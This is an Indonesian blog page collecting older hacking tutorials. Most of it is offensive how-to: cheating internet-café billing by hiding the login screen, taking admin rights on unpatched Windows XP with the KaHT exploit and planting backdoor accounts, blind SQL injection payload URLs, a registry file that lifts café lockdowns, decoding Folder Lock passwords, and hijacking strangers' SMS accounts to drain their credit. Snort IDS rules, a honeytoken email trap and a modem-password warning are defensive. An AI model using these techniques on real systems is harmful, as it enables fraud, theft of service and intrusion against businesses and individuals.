Selasa, 25 November 2008

Mencurangi (hampir) Semua Jenis Billing Warnet

Oleh BLiZBS Uchiha
Published: Januari 10, 2007

Artikel ini dibuat oleh seorang newbie dan lamer bernama Blizbs_Uchiha dan ditujukan oleh newbie2 laennya. Buat mas-mas dan om-om yang merasa udah merasa pinter ato udah tau caranya sangat disarankan untuk tidak usah membaca artikel ini karena hanya membuang2 waktu anda yang sangat berharga.

Cara ini saya dapetin pas kantong lagi kempes tapi nafsu online lagi tinggi :)
Setelah muter2 otak sebentar sambil tidur, akhirnya kutemukan cara buat ngakalin billing warnetnya buat ngirit ongkos online.
Kalau cara yang ada di X-Code Magz vol4 itu cuma bisa untuk Billing Explorer(memang bisa, saya sudah membuktikannya)
Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi billing lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis windows!!!

Penasaran mau tau caranya ? Baca aja sampai habis !
Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga usah baca, kecuali pengen mati kebosanan (niru kata-kata siapa ya?:)

Ini dia caranya ...
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah... udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan :)

Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.

Yang harus disiapkan:
1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe setengah isi disket.
Aku nemunya pas smp tapi baru sekarang kepake ^^
2. Muka bego
3. Mental yang kuat

Langkah-langkahnya:

01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana:)
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.

Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.

Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider

CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.

Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan jahatmu tidak diridhai Tuhan :)
Kalo ketahuan langsung pertebal "muka bego"-mu. Misalnya bilang "Eh, kok jadi gini ya? Kemaren ga gini kok." Ato kata-kata lain, tergantung kreatifitas anda.

Penulis tidak bertanggung jawab atas kerugian yang ditimbulkan atas penggunaan artikel ini (Use at Your Own Risk).

Thanx to: ~ Allah swt ~ #yogyafree ~ #jasakom ~ #antihackerlink ~ W1ga5 ~ Blue Spy ~ And all X-Code crew ~

Contact me:
Yahoo ID : blizbs_3690
Frendzta' : www.friendster.com/blizbs3690
Homepage : strife-leonhart.741.com (belom selesai)
Irc : co_jujur^^ @ #banjarmasin #yogyafree @ DAL.Net

Mendapatkan Akses Admin di Windows XP

[07/09/2004, 07:53:00]
by aCh
Terkadang dalam suatu warnet atau Lab atau bahkan kost. yang menggunakan WIndows XP, biasanya pengguna diberikan akses guest atau limited account. Untuk ngeburn CD atau klo mo nginstall program kita ngga akan bisa, karena aksesnya bukan admin. Kadang-kadang ngeselin juga klo kayak gitu, jadi ngga bisa ngapa-ngapain, Burn CD ga bisa, jalanin program ga bisa, pokoknya terbatas banget :(...

gue mo ngasih tips gimana caranya dapetin akses admin yang memanfaatkan kelemahan di Windows XP. Mungkin yg master dah pada tau tips ini, tapi kan ngga semuanya master ;p... gue cuma mo bagi-bagi ilmu aja, siapa tau ada gunanya. Tapi penulis ngga bertanggung jawab klo ada yang menggunakan untuk hal-hal yang kurang bertanggung jawab, tutorial ini cuman untuk iseng-iseng aja, he...

Apa aja yang dibutuhin ?
1. Komputer??
2. Hoki, karena cuman WinXP yg blm di Update aja (ato yg masih Vulner yg bisa diakses)
3. Uang, buat jajan n kewarnet (atau klo mau, bisa ngehack bilingnya, bisa ga pake uang kan... tp bisa2 lo ketangkep)


Langkan pertama lo butuh program exloit KaHT yg dibuat oleh Kralor, KaHT tuh bisa 'NyeCan' beberapa Host, trus dicari mana yg 'Vulner', n jalanin exploit di Host yg Vulner itu. Klo Linknya ga bisa, coba Googling aja, banyak ko, atau klo msh g dpt juga email aja ke gue! klo dah dapet, trus jalanin cmd lewat Run (Start > Run > cmd). Sebelumnya jangan lupa untuk men-disable antivirus, karena kaht dikenali sebagai trojan. Misalkan program kaht ada di drive C, folder kaht, maka pertintahnya sbb:
 
C:\kaht>kaht 127.0.0.0 127.0.0.1
 --> artinya scan Ip dari 127.0.0.0 sampai 127.0.0.1 (127.0.0.1 adalah IP untuk Loopback, artinya kaht melakukan scanning untuk komputer itu sendiri)

Bisa juga untuk Scanning jaringan tertentu misalnya

kaht 192.168.0.0 192.168.0.100

Klo berhasil, lo bakal dapet akses admin..
C:\Windows\system32>
coba check IP nya (ipconfig), apa ini komputer kita ???

TaRaa.... yup, 'Admin Under Control' hehe... dapet deh akses admin :D
Klo dah gini lo bisa ngapain aja lewat komputer itu. Mo, ngeBurn CD, mo liat-liat file yg di 'protect' admin (siapa tau aja ada file2 yg menarik), mo buat user dgn akses admin, atau buat Backdoor biar klo Login usernya punya akses admin.... Atau lo bisa ngisengin temen lo yang satu jaringan (LAN), bisa juga curangin waktu maen game di jaringan... hehe.. kan seru tuh!!

Mendeteksi 'Pengacau' Jaringan

Sebelum ini di bahas, sebaik nya anda membaca manual dari snort.org, http://www.snort.org/docs/writing_rules/chap2.html , disini diminta untuk membuat rules sendiri atau anda bisa memakai rules yang di sedikan oleh snort.org sendiri.

# tar -zxvf snortrules-stable.tar.gz

tapi, saya coba membuat rules sendiri, karena saya kurang suka dengan paket dari orang lain, setelah di gunain tapi tidak tahu gunanya buat apa ;) contoh rules sederhana

# cd rules; touch avudz.conf
# vi avudz.conf
alert tcp any any -> ipsaya/29 21 (content: "root"; \
      msg: "FTP root login";)
alert tcp any any -> ipprivate/24 22 (msg:"sshd access";)
alert tcp any any -> ipsaya/29 21 (content: "anonymous"; \
      msg: "Ada yg Coba FTP server!";)
alert tcp any any -> ipsaya/29 22 (msg:"ada yang login";)
# http://www.linuxsecurity.com/feature_stories/feature_story-144.html

Content digunakan untuk mendefinisikan inputan dari $user, sedangkan msg untuk membuat pernyataan tentang $user yang menggunakan 'content' tersebut.
sebelum rules baru ini di jalankan, pastikan anda membuat direktory logging di /var/log/snort

# mkdir -p /var/log/snort

tetapi jika anda merasa partisi /var anda sudah minim, silahkan buat symbolic link untuk logging, misal

# ln -s /home/avudz/snort/log /var/log/snort
 
ok, selesai sudah ;) sekarang coba kita jalankan software nya.

 
# snort -d -c rules/avudz.conf
Running in IDS mode
Log directory = /var/log/snort
Initializing Network Interface eth0

setelah itu silahkan anda coba ftp / ssh ke server anda dari network yang berbeda ( diconfig saya menggunakan ip public), dan pantau traffic nya.

 
# tail -f /var/log/snort/alert

contoh :

[**] [1:0:0] ada yang login [**]
[Priority: 0]
06/12-05:47:23.911639 202.xxx.xxx.xx:3962 -> 202.xxx.xxx.xxx:22
TCP TTL:64 TOS:0x10 ID:57036 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xAC015F2A  Ack: 0xAD5438B5  Win: 0x3EBC  TcpLen: 32
TCP Options (3) => NOP NOP TS: 16723031 55655688
[**] [1:0:0] Ada yg Coba FTP server! [**]
[Priority: 0]
06/12-05:48:24.419800 202.xxx.xxx.xx:3971 -> 202.xxx.xxx.xxx:21
TCP TTL:64 TOS:0x10 ID:57642 IpLen:20 DgmLen:68 DF
***AP*** Seq: 0xAE133FB1  Ack: 0xAFCB3637  Win: 0x3EBC  TcpLen: 32
TCP Options (3) => NOP NOP TS: 16729081 55661127


Ah.. selesai sudah, tinggal tambahin beberapa rules yang dibutuhkan untuk memantau aktivitas 'machine' anda ;) misalnya iseng mo monitor irc server, tinggal tambahin di avudz.conf 

# vi rules/avudz.conf
alert tcp ipsaya any -> any 6666:7000 (msg:"CHAT IRC "; flow:to_server,established; content: "NICK "; offset:0; classtype:misc-activity; sid:542;  rev:8;)
alert tcp ipsaya any -> any 6666:7000 (msg:"permintaan DCC Chat "; flow:to_server,established; content:"PRIVMSG "; nocase; offset:0; content:" \:.DCC SEND"; nocase; classtype:misc-activity; sid:1639;  rev:3;)
# === done === #

Semua config dan rules nya bisa anda pelajari dari file snortrules-stable.tar.gz yang sudah di extract, seperti msyql rules, backdoor rules, ICMP rules, bad traffic rules dll. yang penting adalah mencoba, jangan pernah menyerah! MERDEKA!! =)

Monitoring Serangan Hacker Ke Jaringan Dengan Snort

Oleh avudz syah putra
Published: Juni 17, 2003
Print   
Snort merupakan salah satu software favorit yang digunakan untuk memproteksi network dari serangan hacker. Proteksi tambahan ini cukup memadai untuk menghindari serangan hacker pada umumnya.

'SNORT' merupakan salah satu software untuk mendeteksi intrusi pada system, mampu menganalisa 'real-time traffic' dan logging ip, mampu menganalisa port dan mendeteksi segala macam 'serangan' dari luar seperti buffer overflows, stealth port scans, CGI attacks, SMB probes, OS fingerprinting. secara default nya snort mempunyai 3 hal yang terpenting yaitu :

(1) paket sniffer, seperti tcpdump, iptraf dll 
(2) paket logger, yang berguna untuk paket traffic dll
(3) NIDS, deteksi intrusi pada network.


1.1 Pengenalan
Snort bukanlah software yang sulit, tapi perlu banyak latihan karena banyaknya 'command-command' yang harus digunakan, tujuan dari pembuatan artikel ini untuk membuat user lebih mudah untuk mengenali 'snort'.
 
1.2 Instalasi
download paket yang terbaru dari snort.org, saya disini menggunakan snort 2.0.0
 

# wget -c http://www.snort.org/dl/snort-2.0.0.tar.gz

jangan lupa juga mendownload rules terbaru.
 

# wget -c http://www.snort.org/dl/rules/snortrules-stable.tar.gz

extract dan install paket snort
 

# tar -zxvf snort-2.0.0.tar.gz ; cd snort-x.x.x ; ./configure ; make ; make install

untuk lebih lengkap nya silahkan baca ./configure --help  secara default snort akan terinstall di /usr/local/bin/snort

1.3 Paket Sniffer
fyuh, mari coba pelajaran dasar dulu ;) jika anda ingin menampilkan TCP/IP header ke layar ( mis. sniffer mode ), coba perintah ini:
 

# snort -v
 
command di atas akan menjalan snort dan hanya akan menampilkan IP dan TCP/UDP/ICMP header, tapi jika anda mau melihat transit data coba dengan command ini

# snort -vd

instruksi tersebut akan menampilkan transit data, tapi jika anda mau lebih spesifik coba dengan

 

# snort -vde


1.3 Paket logger
ok, command-command di atas mungkin hanya sebagai pengenalan, pada instruksi diatas ada kasus dimana kita tidak mungkin melihat ke layar setiap menit nya ;) oleh karena itu dibutuhkan log, sebelum nya buat direktori 'log' di direktori kerja anda sekarang
 

# mkdir -p log
# snort -dve -l ./log


Jika instruksi diatas dijalankan, tetapi anda belum membuad direktory log, maka snort akan segera berhenti dengan keterangan 'ERROR: log directory './log' does not exist', jika berhasil, snort akan menyimpan setiap paket ke dalam direktori-direktory IP address, jika sistem anda memiliki beberapa network tetapi anda hanya ingin memonitor network tertentu saja.

 

# snort -dev -l ./log -h 192.168.1.0/24

Rules ini akan menyimpan setiap data link dan TCP/IP header ke dalam direktory 'log' dan menyimpan setiap paket dari 192.168.1.0 kelas C network.

Blind SQL Injection (Dummy Again)

Oleh Cruz3N
Published: Oktober 1, 2008
Updated: Oktober 13, 2008

Aku akan mencoba menjelaskan sesimple mungkin tentang blind sql injection yang aku anggap dulu rumit banget... Bukannya sok ngajarin atau apalah, disini aku hanya berusaha memberikan apa yang aku punya dan bisa...

Oke, semua bermula karena aku suntuk banget...Semua target .go.id, co.id atau apapun.id dah dibabat habis sama senior disini...Akhirnya tanpa sengaja aku nyangkut ke situs luar...Anggep aja situs tersebut bernama

http://iseng.com/news.php?id=76009

Nah pada target aku kali ini, aku menggunakan sql commands mid() yang hampir sama fungsinya dengan substring()...

Langsung aja aku ketik

http://iseng.com/news.php?id=76009 and 1=0
dan ternyata hasilnya adalah FALSE

http://iseng.com/news.php?id=76009 and 1=1
bernilai TRUE

Nah setelah aku yakin kalo web tersebut vulnerable maka aku melakukan injeksi (hehehehe...)

http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(65)

Nah penjelasannya supaya lo semua pada ngerti (hehehehe...orang aku juga baru belajar, sok ngasih tau...) aku akan coba menjelaskan arti dan makna dari baris URL dan statement diatas...

~ mid(user()1,1) artinya dalam kasus ini aku tidak mengetahui value atau nilai dari user itu apa, maka dalam "()" aku sengaja kosongkan.

~ 1,1 adalah urutan dari value tersebut.

~ CHAR adalah peubah dalam desimal

~ 65 adalah value decimal tersebut dan 65 adalah "A" dalam ASCII so aku akan mengawalinya dengan 65

Nah kalo dah begini apa yang akan terjadi? Dalam tampilan web tersebut akan terjadi true atau false...Nah dalam kasus ini false, berarti aku harus memasukkan nilai yang lain agar menjadi true...

FALSE
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(65)

FALSE
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(66)

TRUE!!!
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(67)

Akhirnya mendapatkan nilai true dan nilai tersebut adalah 67 (C dalam ASCII)

Cari nilai kedua dan caranya adalah...

http://iseng.com/news.php?id=76009 and mid(user(),1,2)=CHAR(67,65)

Nah 1,1 nya dah diganti dengan 1,2...Jadi kalo dah dapet diganti aja jadi 1,3...1,4 dan seterusnya...

Nah akhirnya aku mendapat nilai true pada angka ke 82 (R dalam ASCII)

Lanjutin aja sampe dapet nilai atau value user dan sampai akhirnya menjadi

http://iseng.com/news.php?id=76009 and mid(user(),1,6)=CHAR(67,82,85,90,51,78)

67=C
82=R
85=U
90=Z
51=3
78=N

Ternyata username-nya adalah CRUZ3N (Wow.... Kebetulan yang sangat lucu ;p)

Nah untuk cari passwordnya aku tinggal mengganti value user() menjadi database() dan lakukan semua tahap diatas dari pertama sampe dapet value true...

Contoh:

http://iseng.com/news.php?id=76009 and mid mid(database(),1,5)=CHAR(75,69,82,69,78)

Jadi password yang didapat adalah...

75=K
69=E
82=R
69=E
78=N

Jadi username dan passwordnya adalah CRUZ3N dan KEREN...

Ternyata Blind SQL Injection gak nyebel-nyebelin amat (Tapi ngebetein...). Nah katanya neh...cara ini cukup efektif untuk web yang telah menfilter SQL Injection...Bener gak tuh? Gak tau dah... Ilmu aku belom nyampe situ...

Oke sampe disini aja yah...
Mohon maaf jika ada salah-salah kata dan berhubung aku lupa jadi kagak ada screenshootnya (Padahal kalo ada keren banget tuh ;p).

MENGACAK-ACAK REGISTRY WARNET

Oleh michael hack
Published: Juni 7, 2003

Tulisan ini saya buat selaku seorang newbie, itupun akibat kejengkelan dengan salah satu warnet di Aceh.Semua fasilitas direstric, mulai dari regedit, menu file, run, bahkan floppy A-nya pun di ambil
Mana bisa tenang user pemakainya kalo begini-begini terus keadaannya. Huh…. Jadi sorry-sorry aja kalo anda merasa yang udah senior menerima tutorial ini. Jujur, saya adalah seorang newbie, newbie yang imut dan lucu… newbie yang sangat manis, enggak percaya ???
------------------------------------------------------------------------------------------------------------
 
Sering enggak pergi ke warnet lalu ketika mau mencari sesuatu di komputer warnet, eh... fasilitas find yang ada di warnet dicomot, mau gunain dos eh dimatiin trus runnya diculik... ih... kesel enggak dengan warnet kayak gini. Saya sih kesel buangeet, tapi untung aja yang jaga warnetnya sediikit cakep jadi ya... hehehe... tau sendiri lah!.
 
Tetapi kadang-kadang setiap pergi ke warnet kayak gini kesel juga, user benar-benar di batasi dan satu kunci untuk membuka itu semua adalah REGISTRY. Lalu bagaimana jika ternyata registry warnet juga dikunci, ckkk...ckkk.... untuk itulah saya membuka wawasan anda melalui artikel ini. Tidak perlu menjadi seorang yang expert jika hanya untuk menjebol registry, diluar pakem... enggak juga tuh!
 
Memang sih ada tools yang digunaiin untuk mendukung aksi kita ini, tetapi hampir disetiap warnet dan disetiap komputer tools ini ada kok, cuma sebuah program text editor sederhana seperti notepad, wordpad, kalau mau Microsoft Word juga bisa. Gimana... udah enggak sabar khan buat ngacak warnet dengan 4 langkah mudah... ITS SHOW TIME!!!
 
Langkah pertama yaitu buka text editor kalian, lalu copy-pastekan code berikut ini ke text-editor kalian:
----------------------------[ cut here the code ]------------------------------
REGEDIT4
; awal pembuatan kode mengacak-acak registry warnet

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

; sekarang kode buat ngaktifin run
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=dword:00000000

;proses selesai
----------------------------[ cut here the code ]-----------------------------
 
Langkah kedua save kode tersebut dengan ekstensi REG, misalnya save dengan nama m2love.reg atau terserah anda aja dech, pokoke ekstensinya harus REG
 
Langkah ketiga cukup klik hasil file yang telah anda simpan tadi, kemudian lanjutkan dengan langkah keempat.
 
Langkah terakhir reboot komputer anda, tetapi jangan gunakan telunjuk sakti anda (istillahnya Tri Amperianto). Cukup dengan menggunakan kombinasi Ctrl+Alt+Del, caranya tekan tombol yang bertulisan Ctrl, tahan... jangan dilepas, lalu tekan juga tombol Alt juga jangan dilepas selanjutnya tombol Delete. Diharapkan anda tidak jantungan ketika Windows mengeluarkan popup. Pilih explorer lalu tekan EndTask, tunggu sebentar lalu akan muncul popup lagi, selanjutnya EndTask-kan lagi.
 
Sekarang klik start lalu run dan ketikkan regedit. Zup... regedit yang manis terbuka dan lakukan apa yang ingin anda lakukan... saran aja, rubah aja RegisterOwner dan Organization dengan nama anda, bukan apa-apa... biasa, pingin terkenal, hehehehe... 
Lalu selanjutnya apalagi… ya selanjutnya anda bisa berkunjung ke channel kami di #gangcarding on DalNet, situs yang cukup hangat dibandingkan situs yang berlagak expert tapi kosong dan sepi, hehehehe…. (promosi) dan jangan lupa buat ngeklik nick m_beben, nicknya seorang newbie yang manis dan imut… enggak sombong !!! 
 
 
Kritik dan saran bisa anda kirimkan ke hack_1986@yahoo.com tapi saya lebih ingin menunggu tutorial-tutorial anda semua agar cepat naik pangkat, tapi kalo kritik juga boleh, biasa dalam suatu pengantar alasannya agar menyempurnakan makalah…

Tips: Menjebak Hacker

Oleh dktrooper
Published: Agustus 12, 2007
Account Webmail adalah target utama hacker/cracker/phiser, bisa dikatakan account webmail adalah harta karun yang harus kita jaga baik-baik, jangan sampai orang lain tahu.
Kerahasiaan informasi webmail kadangkala lebih penting daripada account bank
online kita.
Jika webmail kita dihack, semua informasi penting termasuk login bank, administrasi situs, dan semua website yang berhubungan dengan webmail kita (yang menggunakan sistem kirim password ke email jika kita lupa) bisa-bisa dibobol juga.
Bahkan di dalam sebuah wawancara, seorang phisher mengaku bisa memperoleh ribuan dolar setiap harinya dengan membobol email account dan mengumpulkan informasi finansial yang berharga di dalamnya [ http://find.pcworld.com/57837].
Masalahnya adalah kita tidak pernah tahu jika account webmail kita pernah dibobol atau tidak, kecuali jika kita sudah tidak bisa login memakai informasi password yang kita tentukan, yang berarti telah ada hacker yang masuk ke webmail kita dan merubah password webmail tersebut. Dan bisa saja sang hacker setelah membaca email kita kemudian menandainya sebagai belum terbaca (unread), yang kita tidak akan pernah sadar jika email tersebut telah dibaca orang.
Untuk mendeteksi kemungkinan dibobolnya email kita, bisa dengan menyelipkan script dari situs hit counter ke dalam email sehingga jika ada yang membukanya otomatis hit counter akan bertambah, seperti dibahas di
http://www.stuff.web.id/2007/08/tips-berburu-maling.html.
Sebagai alternatif, kita bisa membuat sendiri script PHP sederhana seperti berikut:
/*
Alarm pendeteksi hacker untuk Webmail
By dktrooper/at/stuff.web.id
*/
putenv("TZ=SE Asian Standar Time/Jakarta");
$gmt_dif = +7; // Beda waktu dengan GMT
$timestamp = time() + 60*60*($gmt_dif); // Hitung jam
$date = date('F-j-Y', $timestamp);
$time = date('g:i a', $timestamp);
$fp = fopen('xlogs.txt','a');
fputs($fp, "IP: ".getenv('REMOTE_ADDR')."\nBROWSER: ".getenv('HTTP_USER_AGENT')."\nDATE: ". $date." ".$time."\n\n"); // Catat Log
fclose($fp);
?>
Simpan dengan nama access_logs.php. Buat file xlogs.txt (atur permisinya ke 777 sehingga bisa ditulisi oleh nobody) dan juga file htacces seperti di bawah:
RewriteEngine On
RewriteRule ^passwordku.html$ access_logs.php
Sehingga semua request ke passwordku.html akan diarahkan ke access_logs.php (mirip dengan trik yang saya terapkan dalam kasus
detikinet [ http://www.stuff.web.id/2007/07/beware-of-hotlinking.html])
Ok, jebakan sudah, sekarang saatnya kita buat umpan. Tulis email dalam format html yang isinya daftar user+password palsu dan tambahkan skrip ini (dalam mode html):
Beri subject: "Password Penting" dan kirim ke email Anda sendiri (atau semua email yang perlu dimata-matai) Apabila format html tidak diperbolehkan, bisa pakai format teks biasa dan tambahkan http://situs-anda.org/passwordku.html, sehingga hacker akan tertarik dan mengunjungi halaman jebakan yang telah disiapkan.
Apabila ada yang membuka email atau link tersebut, maka hasil Lognya seperti berikut:
IP: x.x.x.x
BROWSER: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3
DATE: August-08-2007 23:33 pm
Alternatif lain, selain mencatatnya ke file xlogs.txt, kita bisa mengirim log di atas ke email kita setiap ada yang mengakses
file passwordku.html, dengan menambahkan beberapa baris skrip pada access_logs.php sehingga menjadi:
/*
Alarm pendeteksi hacker untuk Webmail
By dktrooper/at/stuff.web.id
*/
putenv("TZ=SE Asian Standar Time/Jakarta");
$gmt_dif = +7; // Beda waktu dengan GMT
$timestamp = time() + 60*60*($gmt_dif); // Hitung jam
$date = date('F-j-Y', $timestamp);
$time = date('g:i a', $timestamp);
$fp = fopen('xlogs.txt','a');
fputs($fp, "IP: ".getenv('REMOTE_ADDR')."\nBROWSER: ".getenv('HTTP_USER_AGENT')."\nDATE: ". $date." ".$time."\n\n"); // Catat Log
fclose($fp);
mail("alamat@email.koe","Daftar hacker yang terdeteksi","IP: ".getenv('REMOTE_ADDR')."\nBROWSER: ".getenv('HTTP_USER_AGENT')."\nDATE: ". $date." ".$time."\n\n");
?>
Sebagai usaha pencegahan, jangan pernah menyimpan informasi rahasia dalam email, karena walaupun pelakunya bisa ketahuan, mungkin data-data penting atau bahkan account bank kita sudah diobok-obok terlebih dulu.
 
Mudah-mudahan bermanfaat.
Salam.

Cara Mudah Decrypt Password Folder Lock 5.8/5.9

Oleh lovepassword
Published: May 26, 2008
Updated: May 30, 2008

kalau pada pembahasan sebelumnya Mas macanCreW (27 Nov 2007) telah membahas cara mudah mereset program Folder Lock, maka saya pada kesempatan ini ingin berbagi cara mendekrip atau membaca isi password Folder Lock termasuk Folder Lock yang terbaru saat ini yaitu versi 5.9.

Cara mendekrip password FolderLock tidak terlalu sulit. Langkah-langkahnya adalah sebagai berikut :

Buka registry pada bagian :
HKEY_CURRENT_USERSoftwareMicrosoftWindowsQualityControl
_pack = "ini password tersandikan"

Anggap saja isi dari _pack = espxttbqfwpm~~~~

Pertama-tama : Abaikan tanda uler keket ~~~~ karena lambang itu tidak dibaca oleh file konfigurasinya.

Kemudian balik isi password yang terbaca di registry : espxttbqfwpm kalo dibalik akan menjadi
mpwfqbtt ...dan seterusnya.


Langkah selanjutnya mundurkan semua karakter masing-masing sebanyak satu karakter.
m diundurkan satu karakter menjadi l karena l letaknya satu karakter sebelum m
p diundurkan menjadi o
w menjadi v dan seterusnya

Sampai akhirnya terbacalah password aslinya yaitu :lovepassword.

Mudah sekali bukan membaca password FolderLock.

Bila anda tidak ingin mendekrip secara manual. Saya sudah buatkan toolsnya di :

http://lovepassword.blogspot.com/2008/05/cara-mudah-mendecrypt-password-folder.html

Membajak SMS Satelindo

Oleh ftp_geo
Published: Agustus 6, 2003

Ini ada cara membajak nomor HP Satelindo. Bisa Mentari & Matrix. Caranya? waduh mudah sekali.. ini cuman permainan Web Hacking plus sedikit psikologikal hacking.



LATAR BELAKANG
================
Satelindo sebagai operator mobile phone di Indonesia, rupanya nggak mau kalah sama adiknya M3 yang udah duluan menyediakan layanan SMS gratis via web. Layanan ini tersedia di alamat http://www.satelindogsm.com. Dengan mendaftarkan nomor Satelindo yang kita miliki, sudah bisa mengirimkan SMS via web.

Namun, ada satu kelemahan psikologikal pada layanan ini. Yaitu, tidak adanya konfirmasi ke nomor telepon pendaftar untuk mengaktifkan layanan ini. Sehingga semua orang yang mengetahui nomor Indosat Satelindo (walaupun milik orang lain) bisa mendapatkan layanan free SMS ini.

TRIKNYA
=========
Nah! Sekarang, silahkan buka www.satelindogsm.com dan daftarkan nomor SATELINDO siapa saja yang Anda kenal. Anda bisa melakukan hoax (menakut-nakuti) dengan mengirimkan SMS ke pemilik nomor tersebut. "Hehehe.. aku nyolong pulsamu.." Nah, dia akan menerima SMS dari nomor HPnya sendiri!!

Parahnya lagi, jika SMS via web ini digunakan untuk mengirimkan SMS ke operator lain, seperti Telkomsel, ProXL, apalagi keluar negeri!! Si pemilik nomor akan kehilangan pulsanya dengan cepat..

Penangkalannya: segera daftarkan nomor Satelindo Anda! Jangan samapai digunakan orang yang tidak bertanggung jawab!!

Bagi pihak Satelindo: jangan biarkan user memilih sendiri passwordnya via web ketika registrasi, lebih aman jika password dikirimkan ke HP. Lalu jika sang pengguna ingin mengganti passwordnya menjadi lebih manusiawi (bukannya hjf7673 gitu), sediakan saja fasilitas penggantian password sesudah dia login.

=============================================================================
TULISAN INI DIBUAT SEMATA-MATA HANYA UNTUK KEBUTUHAN PEMBELAJARAN
SEGALA EFEK YANG DITIMBULKAN AKIBAT TULISAN INI BUKAN TANGGUNG JAWAB PENULIS!
=============================================================================

(Trik ini saya dapat ketika me-registrasikan nomor Mentari istri saya yang tercinta, ketika dia dan HPnya ada di rumah..)

--EOF--

Catatan: Walaupun sudah di pacth, nggak ada salahnya diposting sekedar buat pembelajaran. Siapa tau ada yang mengulangi kesalahan ini.. Eh kebalik! Supaya kesalahan ini tidak terulang..
=p~~


Hack Speedy : hati-hati dengan modem Speedy mu!


Sunday, 14 October 2007 · 33 Comments

Telkom Logo

Postingan ini tidak ada hubungannya dengan usaha untuk meng hacking telkom speedy. Atau bagaimana cara meng crack billing speedy. Tetapi, postingan ini lebih cenderung sebagai pemberitahuan atau peringatan bagi pengguna speedy agar lebih berhati-hati dengan account speedy mereka.

Tahukah kamu kalau banyak pengguna speedy yang lupa tidak mengganti akun dan password mereka di modem adsl. Tindakan ini ternyata bisa mengundang seorang hacker ataupun lamer untuk mengobrak-abrik modem DSL mu.


Lho, kok bisa?

Tentu bisa, kalau kita connect ke internet dengan speedy. Ibaratnya kita terkoneksi ke jaringan yang sangat luas. Coba cek IP kamu saat terkonek ke speedy. misal : 125.64.224.2. Itu artinya kamu, satu zone (maaf, lupa istilahnya apa) dengan mereka yang memiliki IP 125.64.224.1~125.64.224.225. Nah, kalau saja ada orang yang men scan IP kamu dan kamu lupa mengganti akun dan password kamu maka si hacker akan dengan mudah masuk ke modem kamu, dengan cara mempaste IP kamu di browser. Sebagaimana diketahui kalau tiap modem memiliki password default alias bawaan dari pabrik. Dan itu ada di tiap manual modem dan mudah untuk didapatkan via om google. Kalau pengguna lupa untuk mengganti tuh password, bisa di pastikan si hacker bisa masuk ke dalam modem dengan password default modem. Dan mendapatkan account dan password Speedy kamu yang tersimpan di dalam modem. Atau bisa saja dia meng “oprek” modem kamu. Sehingga kamu tidak bisa connect ke internet.

Untung pihak telkom telah mengantisipasinya dengan “mendisable” akses internet dengan jaringan telpon yang resmi. Maksudnya, walau si hacker dapat no speedy dan password kamu. Dia tetap tidak bisa memakai account kamu untuk koneksi ke internet. Karena dia memakai jaringan telepon yang berbeda dengan telpon kamu (carrier-nya berbeda). Tapi, di bisa mengacak-acak password kamu di website speedy. Kan, report juga kalau harus sering reset password di server?

So, Bagi para pengguna speedy jangan lupa untuk segera mengganti password di modem dan di website telkom speedy.